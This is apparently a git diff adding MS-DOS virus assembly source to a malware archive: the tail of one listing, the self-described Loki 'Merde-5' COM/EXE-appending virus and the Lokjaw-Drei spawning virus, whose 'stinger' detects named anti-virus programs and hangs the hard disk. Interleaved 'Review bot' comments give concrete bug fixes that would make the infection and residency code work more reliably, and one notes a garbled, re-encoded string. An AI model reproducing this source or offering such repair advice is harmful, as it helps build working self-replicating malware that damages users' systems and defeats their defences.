+ mov ch, [c4-6] + mov cl, [c5-6] + int 10h + mov ax, 0003h + int 10h ; sort of a cls + mov ax, 00ffh + ret + + +eyes db '(o) (o)','$' ; ASCII eyes +vict_head db 090h, 0cdh, 020h, 043h, 044h, 00h ; 6 bytes of host +jump db 0E9h +initials dw 4443h ; I.D. +exe dw 5A4Dh ; ZM - ident for .EXE files +last db 090h + +data_1 db 0 +data_2 db 0 +old_21h dw 00h,00h +old_24h dw 00h,00h +old_10h dw 00h,00h +name_seg dw ? +name_off dw ? +vir_seg dw ? +len_file dw ? +handle dw ? +date dw ? 
+time dw ? +c1 db 0 +c2 db 0 +c3 db 0 +c4 db 0 +c5 db 0 + +code ends + end host + + + diff --git a/MSDOS/Virus.MSDOS.Unknown.loki1237.asm b/MSDOS/Virus.MSDOS.Unknown.loki1237.asm new file mode 100644 index 00000000..54030d72 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.loki1237.asm 
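Review bot: The `int21` helper's `jc notforme` leaves its own near return address (two of them when called from set_attrib or get_date) on the stack when the DOS call fails, so the register restore in notforme pops into the wrong registers and `popf` / `jmp dword ptr cs:[old_21h-6]` run on a misaligned stack; the caller-side checks such as `jc close_file` after open_victim can never fire, the handle stays open and the Int 24h hook installed by Grab_24 is never restored. Dropping that line (`int21: pushf` / `call dword ptr cs:[old_21h-6]` / `ret`, since ret preserves the carry flag) lets the existing caller checks do the error handling. In chk_com, `repne scasb` runs with whatever CX the caller left in it, so the scan for '.' has an arbitrary length and a name without a '.' still falls through to the extension and the_stinger compares; load `mov cx,80h` before it and add `jne notforme` immediately after. Note also that under `.radix 16` the bare `sub ax,100` in cut_hole removes 100h paragraphs from the MCB, which is easy to misread as decimal.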
@@ -0,0 +1,613 @@ +; Okay, here is my newest version.. It now +; offers EXE infection. I messed up command.com +; compatibility so this version won't infect it. +; Also, this version might be a little shakey, +; but it should work okay with most setups +; (I'm not professional yet, so screw 'em +; if this hangs!).. +; This will be the last time I release code for +; my virii. Thanks to firststrike, and anyone else +; who has given me tips..... +; Be careful not to get this, it is kinda hard to get rid +; of (it would be REALLY hard to get rid of if it infected +;command.com- I will have to fix that (along with the TERRIBLE +; inefficiency in my interrupt handler (the loader is OKAY, but +; My_21 is just kind of a jumble of code thrown together for now. +; If you want to vaccinate your system, and you know a little about +; assembler, it isn't that hard. (I gave the come version to +; myself about 3 times). Just take notice of my use of interrupt +; 71...(This will be changed in future versions, for obvious reasons). +; MERDE-5 The merde virus version 5.0- loki + + +compare_val equ 850 +interrupt equ 21h +Code_seg Segment Byte + Assume DS:Code_seg, CS:Code_seg + ORG 100h + +start: call get_ip + +exe_or_com: + dw 'CO' +get_ip: + pop di + sub di,3 + cmp word ptr cs:[di+3],'EX' + jne com_memory_loader + jmp exe_memory_loader + +;Load memory from within an EXE file.. +;------------------------------------------------------------------------------ +exe_memory_loader: + call check_for_int_71 + jc go + call get_memory ;es=my_segment + jnc aaaa + jmp exit_exe +aaaa: + call hide_memory + call set_int_71 + call save_21 + push ds + call move_all_code + pop ds + mov bx,es + call set_21 +go: jmp exit_exe + +;------------------------------------------------------------------------------ +;****************************************************************************** +;------------------------------------------------------------------------------ +;load memory from a COM file... 
+ +com_memory_loader: + call restore_com + call check_for_int_71 + jc go_1 + call get_memory + jnc bbbb + jmp exit_com + +bbbb: call hide_memory + +reset_di: + call set_int_71 + call save_21 + call move_all_code + mov bx,es + call set_21 +go_1: jmp exit_com + +;------------------------------------------------------------------------------ +;Returns ES with my segment (or an error) +;------------------------------------------------------------------------------ +get_memory: + int 12h + mov bx,cs + mov cx,1024 + mul cx + clc + mov cx,600h ;Amount of needed memory + sub ax,cx + sbb dx,0000 ;dx:ax=where we want this mem to end! + mov bx,dx + mov bp,ax ;save this... + mov cx,cs + mov ax,0010h + mul cx + clc + mov cx,di + add cx,offset ending-100h + add ax,cx + adc dx,0000 + clc + sub bp,ax + sbb bx,dx + clc + mov ax,bp + mov dx,bx + mov cx,0010h + div cx ;dx:ax=memory above this-divide it by 16 + mov bx,ax + mov ah,4ah + int 21h + jc get_memory_error + mov bx,60 + mov ah,48h + int 21h + jc get_memory_error + mov es,ax + clc + ret +get_memory_error: + stc + ret +;------------------------------------------------------------------------------ +;Moves all code + PSP to my secretive little segment-destroys DS (in EXE files) +;------------------------------------------------------------------------------ +move_all_code: +;move PSP************************** + push di + xor si,si + xor di,di + mov cx,100h + rep movsb +;********************************** +;move my code********************** + pop si + push si + push cs + pop ds + mov cx,offset ending-100h + rep movsb + pop di + ret +;********************************** +;------------------------------------------------------------------------------ +;------------------------------------------------------------------------------ +;saves interrupt 21 in cs:[int_21_saveo] +save_21: + push es + xor ax,ax + mov es,ax + mov ax,es:[interrupt*4] + mov bx,es:[interrupt*4+2] + mov cs:[di+offset int_21_saveo-100h],ax + mov cs:[di+offset 
int_21_saves-100h],bx + pop es + ret + +;----------------------------------------------------------------------------- +;sets interrupt 21 to bx:offset of my_21 +set_21: + push es + xor ax,ax + mov es,ax + mov es:[interrupt*4],offset my_21 + mov es:[interrupt*4+2],bx + pop es + ret +;----------------------------------------------------------------------------- +;----------------------------------------------------------------------------- +;Restores a COM file +restore_com: + push di + mov si,di + add si,offset three_bytes-100h + mov di,0100h + mov cx,3 + rep movsb + pop di + ret +;------------------------------------------------------------------------------ +;Hides my segment's (es) size and owner +hide_memory: + push ds + xor cx,cx + mov ds,cx + mov cx,ds:[2eh*4+2] + pop ds + push ds + mov dx,es + dec dx + mov ds,dx + mov ds:[1],cx ;maybe later set to DOS seg + mov byte ptr ds:[0],'Z' + mov word ptr ds:[3],0000 + mov es:[16h],cx + mov es:[0ah],cx + mov es:[0ch],cx + pop ds + ret +;------------------------------------------------------------------------------ + +;check_for_int 71- My little multiplex interrupt +check_for_int_71: + int 71h + cmp ax,9999h + je set_c + clc + ret +set_c: + stc + ret +;------------------------------------------------------------------------------ + +;Set interrupt 71: +set_int_71: + push ds + xor ax,ax + mov ds,ax + mov ds:[71h*4+2],es + mov ds:[71h*4],offset my_71 + pop ds + ret + + +exit_com: + xor cx,cx + xor dx,dx + xor ax,ax + xor bx,bx + xor si,si + xor di,di + mov ax,100h + jmp ax + +exit_exe: + push ds + pop es + mov ax,es + add ax,10h + add word ptr cs:[di+offset orig_cs-100h],ax + cli + add ax,word ptr cs:[di+offset orig_ss-100h] + mov ss,ax + mov sp,word ptr cs:[di+offset orig_sp-100h] + sti + jmp dword ptr cs:[di+offset orig_ip-100h] + +;------------------------------------------------------------------ +my_21: + cmp ah,4bh + je okay_go + cmp ah,0fh + je okay_go + cmp ah,3dh + je okay_go + cmp ah,43h + je okay_go + jmp 
continue_21 +okay_go: + push ax + push bx + push cx + push dx + push es + push di + push si + push bp + push es + push ds +check_for_com: + xor si,si + mov bx,dx +looper: + cmp word ptr ds:[bx+si],'c.' + je check_om + cmp word ptr ds:[bx+si],'C.' + je check_om + cmp word ptr ds:[bx+si],'e.' + je check_ex + cmp word ptr ds:[bx+si],'E.' + je check_ex + inc si + cmp si,40 + jne looper + jmp give_up1 +check_om: + cmp word ptr ds:[bx+si+2],'mo' + jne bb + mov cs:[com_or_exe],0 + jmp check_for_infection +bb: cmp word ptr ds:[bx+si+2],'MO' + jne cc + mov cs:[com_or_exe],0 + jmp check_for_infection +cc: jmp give_up1 +check_ex: + cmp word ptr ds:[bx+si+2],'ex' + jne label1 + mov cs:[com_or_exe],1234h + jmp okay_do +label1: + cmp word ptr ds:[bx+si+2],'EX' ;FIX ME!!!!!!! + je cccc ;forget exe for now.. + jmp give_up1 +cccc: + mov cs:[com_or_exe],1234h + jmp okay_do +check_for_infection: + cmp word ptr [bx+si-2],'DN' + jne okey_k + jmp give_up1 +okey_k: + cmp word ptr [bx+si-2],'DN' + jne okay_do + jmp give_up1 +okay_do: + mov cs:[storage_1],ds + mov cs:[storage_2],dx + mov ah,50h ;set PSP to ours + push cs + pop bx + call dos_21 + mov ah,43h + xor al,al + call dos_21 + jnc okay9 + jmp give_up +okay9: mov cs:[attrib],cx + mov ah,43h + mov al,1 + xor cx,cx + call dos_21 + mov ah,3dh + mov al,2 + call dos_21 + jnc okay10 + jmp give_up +okay10: mov cs:[handle],ax + mov bx,ax + mov ah,57h + xor al,al + call dos_21 + mov cs:[date],dx + mov cs:[time],cx + mov ax,4202h + xor dx,dx + xor cx,cx + call dos_21 + jnc okay11 + jmp give_up +okay11: mov cs:[file_size],ax + cmp cs:[com_or_exe],1234h + jne okey_p + sub ax,compare_val + sbb dx,0000 + mov cx,dx + mov dx,ax + jmp contin2 +okey_p: xor cx,cx + cmp ax,63000 + jb contin1 + call reset_all + jmp give_up +contin1: + cmp ax,600 + jnb continx + call reset_all + jmp give_up +continx: + sub ax,compare_val + mov dx,ax + xor cx,cx +contin2: + mov ax,4200h + mov bx,cs:[handle] + call dos_21 + mov ah,3fh + push cs + pop ds + mov dx,offset 
buffer + mov cx,2 + call dos_21 + mov ax,word ptr cs:[buffer] + mov bx,word ptr cs:[offset dont_write-compare_val] + cmp ax,bx + jne dddd + jmp give_up +dddd: + cmp cs:[com_or_exe],1234h + je infect_exe + jmp infect_com + +infect_exe: + mov bx,cs:[handle] + xor dx,dx + xor cx,cx + mov ax,4200h + call dos_21 + push cs + pop ds + mov ah,3fh + mov cx,18h + mov dx,offset header + call dos_21 + cmp word ptr [header+8],1000h + jb okayh + call reset_all + jmp give_up +okayh: mov ax,word ptr [header+16h] + mov orig_cs,ax + mov ax,word ptr [header+14h] + mov orig_ip,ax + mov ax,word ptr [header+0eh] + mov orig_ss,ax + mov ax,word ptr [header+10h] + mov orig_sp,ax + mov ax,4202h + mov bx,handle + xor cx,cx + xor dx,dx + call dos_21 + mov word ptr ds:[exe_or_com],'EX' + mov high_size,dx + mov low_size,ax + mov real_hsize,dx + mov real_lsize,ax + mov ax,word ptr [header+8] + mov cx,10h + mul cx + clc + sub low_size,ax ;high_size:low_size=load size + sbb high_size,dx + clc + mov dx,high_size + mov ax,low_size + mov cx,0010h + div cx + cmp dx,0 + je okay + mov cx,16 + sub cx,dx + mov bp,cx + add real_lsize,bp + adc real_hsize,0000 + clc + stc + adc ax,0000 + jmp okay1 +okay: xor bp,bp +okay1: xor dx,dx + mov word ptr [header+16h],ax + ;add to dx? 
+ mov word ptr [header+14h],dx + mov word ptr [header+0eh],ax + mov dx,0fffeh + mov word ptr [header+10h],dx + mov dx,real_hsize + mov ax,real_lsize + add ax,offset ending-100h+1 + adc dx,0000 + push ax + mov cl,9 + shr ax,cl + ror dx,cl + stc + adc dx,ax + pop ax + and ah,1 + mov word ptr [header+4],dx + mov word ptr [header+2],ax + mov ah,40h + mov bx,handle + mov cx,offset dont_write-100h + add cx,bp + mov dx,100h + sub dx,bp + call dos_21 + mov ax,4200h + xor cx,cx + xor dx,dx + mov bx,handle + call dos_21 + mov ah,40h + mov bx,handle + mov cx,18h + mov dx,offset header + call dos_21 + call reset_all + jmp give_up + +infect_com: + xor cx,cx + xor dx,dx + mov bx,cs:[handle] + mov ax,4200h + call dos_21 + mov ah,3fh + mov cx,3 + push cs + pop ds + mov dx,offset three_bytes + call dos_21 + mov ax,cs:[file_size] + sub ax,3 + mov word ptr cs:[jumper+1],ax + mov word ptr cs:[exe_or_com],'CO' + call write_to_end + xor cx,cx + xor dx,dx + mov ax,4200h + mov bx,cs:[handle] + call dos_21 + mov dx,offset jumper + mov ah,40h + mov cx,3 + call dos_21 + call reset_all +give_up: + mov ah,50h + mov bx,cs:[storage_1] + call dos_21 +give_up1: + pop ds + pop es + pop bp + pop si + pop di + pop es + pop dx + pop cx + pop bx + pop ax + jmp continue_21 +continue_21: + jmp dword ptr cs:[int_21_saveo] +dos_21: + pushf + call dword ptr cs:[int_21_saveo] + ret + +reset_all: + mov bx,cs:[handle] + mov cx,cs:[time] + mov dx,cs:[date] + mov ax,5701h + call dos_21 + mov ah,3eh + mov bx,cs:[handle] + call dos_21 + mov ah,43h + mov al,1 + mov cx,cs:[attrib] + mov ds,cs:[storage_1] + mov dx,cs:[storage_2] + call dos_21 + ret + +write_to_end: + + mov ax,4202h + xor dx,dx + xor cx,cx + mov bx,cs:[handle] + call dos_21 + mov ah,40h + mov cx,offset dont_write-100h + push cs + pop ds + mov dx,0100h + call dos_21 + ret +my_71: + mov ax,9999h + iret + + +jumper: + db 0e9h,00,00 +storage_1 dw 0000 +storage_2 dw 0000 +int_21_saveo dw 0000 +int_21_saves dw 0000 +three_bytes: db 0cdh,20h,90h +db 'Loki' 
+orig_ip dw 0000 +orig_cs dw 0000 +orig_ss dw 0000 +orig_sp dw 0000 +dont_write: + +header: + db 24 dup(00) +com_or_exe dw 1234h +handle dw 0000 +file_size dw 0000 +attrib dw 0000 +date dw 0000 +time dw 0000 +buffer: dw 0000 +loader_high dw 0000 +loader_low dw 0000 +header_cs dw 0000 +header_ip dw 0000 +low_size dw 0000 +high_size dw 0000 +real_hsize dw 0000 +real_lsize dw 0000 +ending: +Code_seg ENDS +END start \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lokjawd.asm b/MSDOS/Virus.MSDOS.Unknown.lokjawd.asm new file mode 100644 index 00000000..f8d86711 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lokjawd.asm 
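Review bot: `give_up` restores the current PSP with `mov bx,cs:[storage_1]` / `mov ah,50h`, but storage_1 was loaded from DS at okay_do (the segment of the filename argument), not from the caller's PSP; the two coincide only for a .COM caller, so for an .EXE caller whose DS differs from its PSP DOS is left pointing at the wrong PSP after the hooked call returns. Capture the real value once with `mov ah,51h` / `call dos_21` (BX = current PSP) into a dedicated word before the `mov ah,50h` switch and pass that back at give_up. get_memory allocates only `mov bx,60` paragraphs (960 bytes) with function 48h, while move_all_code copies 100h bytes of PSP plus `offset ending-100h` bytes of code into that block; if the resident image exceeds 3C0h bytes, as the 1237 in the file name suggests, the copy overruns the block into memory the virus never claimed. The presence check `int 71h` in check_for_int_71 invokes whatever is on that vector when the virus is not resident, which on AT-class BIOSes is normally a hardware-IRQ (IRQ 9 cascade) handler; the author's own comment flags this for change.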
@@ -0,0 +1,559 @@
+;LOKJAW-DREI: an .EXE-infecting spawning virus with retaliatory
+;anti-anti-virus capability. For Crypt Newsletter 12, Feb. 1993.
+;
+;LOKJAW-DREI is a resident spawning virus which installs itself in
+;memory using the same engine as the original Civil War/Proto-T virus.
+;It is simpler in that none of its addresses have to be
+;relative, an indirect benefit of the fact that the virus has no
+;"appending" quality. That means, LOKJAW doesn't alter its "host" files,
+;just like a number of other companion/spawning viruses published in
+;previous newsletters.
+;
+;LOKJAW hooks interrupt 21 and infects .EXE files on execution, creating
+;itself as companion .COMfile to the "host." Due to the inherent rules
+;of DOS, this ensures the virus will be executed before the "host" the
+;next time the infected program is used. In reality, LOKJAW is even
+;simpler than that. If not in memory, the first time the host is
+;called, LOKJAW will go resident and not even bother to load it.
+;In most cases, the user will assume a slight error and call the host
+;again, at which point it will function normally. LOKJAW will then infect
+;every subsequent .EXE file called. LOKJAW is very transparent in operation,
+;except when certain anti-virus programs (Integrity Master, McAfee's SCAN &
+;CLEAN, F-PROT & VIRSTOP and Central Point Anti-virus) are loaded.
+;
+;LOKJAW's "stinger" code demonstrates the simplicity of creating a strongly
+;retaliating virus by quickly deleting the anti-virus program before it
+;can execute and then displaying a "chomping" graphic. Even if the anti-
+;virus program cannot detect LOKJAW in memory, it will be deleted. This
+;makes it essential that the user know how to either remove the virus from
+;memory before beginning anti-virus measures, or at the least run the
+;anti-virus component from a write-protected disk. 
At a time when retail
+;anti-virus packages are becoming more complicated - and more likely that the
+;average user will run them from default installations on his hard file -
+;LOKJAW's retaliating power makes it a potentially very annoying pest.
+;A virus-programmer serious about inconveniencing a system could do a
+;number of things with this basic idea. They are;
+; 1. Remove the "chomp" effect. It is entertaining, but it exposes the virus
+; instantly.
+; 2. Alter the_stinger routine, so that the virus immediately attacks the
+; hard file. The implementation is demonstrated by LOKJAW-DREI, which
+; merely makes the disk inaccessible until a warm reboot if an anti-virus
+; program is employed against it. By placing
+; a BONA FIDE disk-trashing routine here, it becomes very hazardous for
+; an unknowing user to employ anti-virus measures on a machine where
+; LOKJAW or a LOKJAW-like program is memory resident. While LOCKAW and
+; LOKJAW-ZWEI will produce write-protect errors if an anti-virus program
+; is run against them from a write-protected diskette, LOKJAW-DREI
+; won't. It will recognize the anti-virus program, display the "chomp"
+; and mimic trashing the hard file. This effect makes the disk inacessible
+; until the machine is rebooted.
+;
+;The anti-anti-virus strategies are becoming more common in viral programming.
+;Mark Ludwig programmed the features of a direct-action retaliating
+;virus in his "Computer Virus Developments Quarterly." Peach, Groove and
+;Encroacher viruses attack anti-virus software by deletion of key files.
+;And in this issue, the Sandra virus employs a number
+;of anti-anti-virus features.
+;
+;The LOKJAW source listings are TASM compatible. To remove LOKJAW-ZWEI and
+;DREI infected files from a system, simply delete the "companion" .COM
+;duplicates of your executables. Ensure that the machine has been booted
+;from a clean disk. 
To remove the LOKJAW .COM-appending virus, at this
+;time it will be necessary for you to restore the contaminated files from
+;a clean back-up.
+;
+;Alert readers will notice the LOKJAW-ZWEI and DREI create their "companion"
+;files in plain sight. Generally, spawning viruses make themselves
+;hidden-read-only-system files. This is an easy hack and the code is supplied
+;in earlier issues of the newsletter. The modification is left to
+;the reader as an academic exercise.
+
+
+ .radix 16
+ cseg segment
+ model small
+ assume cs:cseg, ds:cseg, es:cseg
+
+ org 100h
+
+oi21 equ endit
+filelength equ endit - begin
+nameptr equ endit+4
+DTA equ endit+8
+
+
+
+
+
+
+begin: jmp virus_install
+
+note:
+ db '[l™‡kõ„W-dâ].á.šrã$ņd‰M–$'
+ db 'ÅH‹$.pâ™Gâ†m.Œ$.….{pâ™Å”-Å].ûƒâ‹†¤Å,$“âÅ.”Ÿ.'
+ db '€â˜ž.¥‰w$Àä×îâ' ;I.D. note: will doubtless
+ ;show up in VSUM
+
+
+ ;install
+virus_install: mov ax,cs ; reduce memory size
+ dec ax
+ mov ds,ax
+ cmp byte ptr ds:[0000],5a
+ jne cancel
+ mov ax,ds:[0003]
+ sub ax,100
+ mov ds:0003,ax
+Zopy_virus:
+ mov bx,ax ; copy to claimed block
+ mov ax,es
+ add ax,bx
+ mov es,ax
+ mov cx,offset endit - begin
+ mov ax,ds
+ inc ax
+ mov ds,ax
+ lea si,ds:[begin]
+ lea di,es:0100
+ rep movsb
+
+
+
+Grab_21:
+
+ mov ds,cx ; hook int 21h
+ mov si,0084h ;
+ mov di,offset oi21
+ mov dx,offset check_exec
+ lodsw
+ cmp ax,dx ;
+ je cancel ; exit, if already installed
+ stosw
+ movsw
+
+ push es
+ pop ds
+ mov ax,2521h ; revector int 21h to virus
+ int 21h
+
+cancel: ret
+
+check_exec:
+ pushf
+
+ push es ; push everything onto the
+ push ds ; stack
+ push ax
+ push bx
+ push dx
+
+ cmp ax,04B00h ; is the file being
+
+
+
+ jne abort ; executed? 
+
+
+
+
+ ;if yes, try the_stinger
+do_infect: call infect ; then try to infect
+
+
+
+
+abort: ; restore everything
+ pop dx
+ pop bx
+ pop ax
+ pop ds
+ pop es
+ popf
+
+Bye_Bye:
+ ; exit
+ jmp dword ptr cs:[oi21]
+
+
+new_24h:
+ mov al,3 ; critical error handler
+ iret
+
+infect:
+ mov cs:[name_seg],ds ; here, the virus essentially
+ mov cs:[name_off],dx ; copies the name of the
+
+ cld ; loaded file into a buffer
+ mov di,dx ; so that it can be compared
+ push ds ; against the default names
+ pop es ; in the_stinger
+ mov al,'.' ; subroutine
+ repne scasb ; <--
+
+ call the_stinger ; check for anti-virus load
+ ; and deploy the_stinger
+
+
+
+ cld
+ mov word ptr cs:[nameptr],dx
+ mov word ptr cs:[nameptr+2],ds
+
+ mov ah,2Fh
+ int 21h
+ push es
+ push bx
+
+ push cs
+
+ pop ds
+ mov dx,offset DTA
+ mov ah,1Ah
+ int 21h
+
+ call searchpoint
+ push di
+ mov si,offset COM_txt
+
+ mov cx,3
+ rep cmpsb
+ pop di
+ jz do_com
+ mov si,offset EXE_txt
+ nop
+ mov cl,3
+ rep cmpsb
+ jnz return
+
+do_exe: mov si,offset COM_txt
+ nop
+ call change_ext
+ mov ax,3300h
+ nop
+ int 21h
+ push dx
+
+ cwd
+ inc ax
+ push ax
+ int 21h
+
+Grab24h:
+
+ mov ax,3524h
+ int 21h
+ push bx
+ push es
+ push cs
+ pop ds
+ mov dx,offset new_24h
+ mov ah,25h
+ push ax
+ int 21h
+
+
+ lds dx,dword ptr [nameptr] ;create the virus (unique name)
+ xor cx,cx
+ mov ah,05Bh
+ int 21
+ jc return1
+ xchg bx,ax ;save handle
+
+
+
+ push cs
+ pop ds
+ mov cx,filelength ;cx= length of virus
+ mov dx,offset begin ;where to start copying
+ mov ah,40h ;write the virus to the
+ int 21h ;new file
+
+ mov ah,3Eh ; close
+ int 21h
+
+return1: pop ax
+ pop ds
+ pop dx
+ int 21h
+
+ pop ax
+ pop dx
+ int 21h
+
+ mov si,offset EXE_txt
+ call change_ext
+
+return: mov ah,1Ah
+ pop dx
+ pop ds
+ int 21H
+
+ ret
+
+do_com: call findfirst
+ cmp word ptr cs:[DTA+1Ah],endit - begin
+ jne return
+ mov si,offset EXE_txt
+ call change_ext
+ call findfirst
+ jnc return
+ mov si,offset COM_txt
+ call change_ext
+ jmp short 
return
+
+searchpoint: les di,dword ptr cs:[nameptr]
+ mov ch,0FFh
+ mov al,0
+ repnz scasb
+ sub di,4
+ ret
+change_ext: call searchpoint
+ push cs
+ pop ds
+ movsw
+ movsw
+ ret
+
+findfirst: lds dx,dword ptr [nameptr]
+ mov cl,27h
+ mov ah,4Eh
+ int 21h
+ ret
+
+the_stinger:
+ cmp word ptr es:[di-3],'MI' ;Integrity Master
+ je jumptoass
+
+ cmp word ptr es:[di-3],'XR' ;VIRX
+ je jumptoass
+
+ cmp word ptr es:[di-3],'PO' ;VIRUSTOP
+ jne next1
+ cmp word ptr es:[di-5],'TS'
+ je jumptoass
+
+next1: cmp word ptr es:[di-3],'VA' ;AV = CPAV
+ je jumptoass
+
+ cmp word ptr es:[di-3],'TO' ;*prot = F-prot
+ jne next2
+ cmp word ptr es:[di-5],'RP'
+ je jumptoass
+
+next2: cmp word ptr es:[di-3],'NA' ;*scan = McAfee's Scan.
+ jne next3
+ cmp word ptr es:[di-5],'CS'
+ je jumptoass
+
+ cmp word ptr es:[di-3],'NA' ;*lean = McAfee's CLEAN.
+ jne next3 ; why not, eh?
+ cmp word ptr es:[di-5],'EL'
+ je jumptoass
+next3: ret
+jumptoass: jmp chomp ;assassination (deletion)
+ ; of anti-virus program
+chomp:
+ push cs ; chomper visual
+ pop ds
+ mov ah, 03h
+ int 10h
+ mov [c1], bh ; save cursor
+ mov [c2], dh
+ mov [c3], dl
+ mov [c4], ch
+ mov [c5], cl
+ mov ah, 1
+ mov cl, 0
+ mov ch, 40h
+ int 10h
+
+ mov cl, 0
+ mov dl, 4Fh
+ mov ah, 6
+ mov al, 0
+ mov bh, 0Fh
+ mov ch, 0
+ mov cl, 0
+ mov dh, 0
+ mov dl, 4Fh
+ int 10h
+
+ mov ah, 2
+ mov dh, 0
+ mov dl, 1Fh
+ mov bh, 0
+ int 10h
+
+ mov dx,offset eyes ; print the eyes
+ mov ah, 9
+ mov bl, 0Fh
+ int 21h
+
+ mov ah, 2
+ mov dh, 1
+ mov dl, 0
+ int 10h
+
+ mov ah, 9
+ mov al, 0DCh
+ mov bl, 0Fh
+ mov cx, 50h
+ int 10h
+
+ mov ah, 2
+ mov dh, 18h
+ mov dl, 0
+ int 10h
+
+ mov ah, 9
+ mov al, 0DFh
+ mov bl, 0Fh
+ mov cx, 50h
+ int 10h
+
+ mov dl, 0
+chomp_1:
+ mov ah, 2
+ mov dh, 2
+ int 10h
+
+ mov ah, 9
+ mov al, 55h
+ mov bl, 0Fh
+ mov cx, 1
+ int 10h
+
+ mov ah, 2
+ mov dh, 17h
+ inc dl
+ int 10h
+
+ mov ah, 9
+ mov al, 0EFh
+ mov bl, 0Fh
+ int 10h
+
+ inc dl
+ cmp dl, 50h
+ jl chomp_1
+ mov [data_1], 0
+chomp_3:
+ mov cx, 
7FFFh ; delays
+
+locloop_4:
+ loop locloop_4
+
+ inc [data_1]
+ cmp [data_1], 0Ah
+ jl chomp_3
+ mov [data_1], 0
+ mov cl, 0
+ mov dl, 4Fh
+chomp_5:
+ mov ah, 6
+ mov al, 1
+ mov bh, [data_2]
+ mov ch, 0Dh
+ mov dh, 18h
+ int 10h
+
+ mov ah, 7
+ mov al, 1
+ mov bh, [data_2]
+ mov ch, 0
+ mov dh, 0Ch
+ int 10h
+ mov cx, 3FFFh ; delays
+
+locloop_6:
+ loop locloop_6
+ inc [data_1]
+ cmp [data_1], 0Bh
+ jl chomp_5
+ mov [data_1], 0
+chomp_7:
+ mov cx, 7FFFh ; delays
+
+locloop_8:
+ loop locloop_8
+ inc [data_1]
+ cmp [data_1], 0Ah
+ jl chomp_7
+ mov ah, 6
+ mov al, 0
+ mov bh, [data_2]
+ mov ch, 0
+ mov cl, 0
+ mov dh, 18h
+ mov dl, 4Fh
+ int 10h
+
+ mov cl, 7
+ mov ch, 6
+ int 10h
+
+ mov ah, 2
+ mov bh, [c1]
+ mov dh, [c2]
+ mov dl, [c3]
+ int 10h
+ mov al, bh
+ mov ah, 5
+ int 10h
+ mov ah, 1
+ mov ch, [c4]
+ mov cl, [c5]
+ int 10h
+ mov ax, 0003h
+ int 10h ; sort of a cls
+ mov ax, 00ffh
+
+ mov si,0 ;scarey part: drive reads real
+scarey: lodsb ;fast ala Michelangelo-style
+ mov ah,al ;over-write, but this routine only
+ lodsb ;gets random bytes here for a
+ and al,3 ;cylinder to READ
+ mov dl,80h
+ mov dh,al
+ mov ch,ah
+ mov cl,1
+ mov bx,offset last ;buffer to read into
+ mov ax,201h
+ int 13h ;jump into a loop, effectively hang machine
+ jmp short scarey ;yow! scarey! just think if this
+ ;was made by someone not as nice as
+ ;me.
+ ;It's not much of a stretch to
+ ;imagine a routine for thumping
+ ;the hard file in place of scarey.
+ ;A retaliating virus of this
+ ;nature is a distinct
+ ;possibility.
+
+EXE_txt db 'EXE',0
+COM_txt db 'COM',0
+
+eyes db '(o) (o)','$' ; ASCII eyes of Lockjaw
+
+data_1 db 0
+data_2 db 0
+
+last db 090H
+name_seg dw ?
+name_off dw ?
+
+c1 db 0
+c2 db 0
+c3 db 0
+c4 db 0
+c5 db 0
+note2: db 'Lokjaw-Drei'
+
+endit:
+
+
+cseg ends
+ end begin
+
+
+
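Review bot: The three `db` lines under `note:` near the top of the new file appear to have been transcoded during upload — sequences such as `â˜ž` and `â™` are the usual multi-byte rendering of single high-bit (CP437-style) bytes, so the listing no longer carries the sample's original byte values there. An archival copy assembled from this text would therefore differ from the original binary in the `note:` region, and any hash or byte-pattern signature derived from this source would not match the sample it documents. If the original bytes cannot be recovered, the file should say so next to the string, e.g. `; note: string re-encoded during archival; original high-bit bytes not preserved`, so nobody treats this region as signature-grade. The plain-ASCII identifiers (`note2:` 'Lokjaw-Drei', the `EXE_txt`/`COM_txt` strings and the header comment) are unaffected.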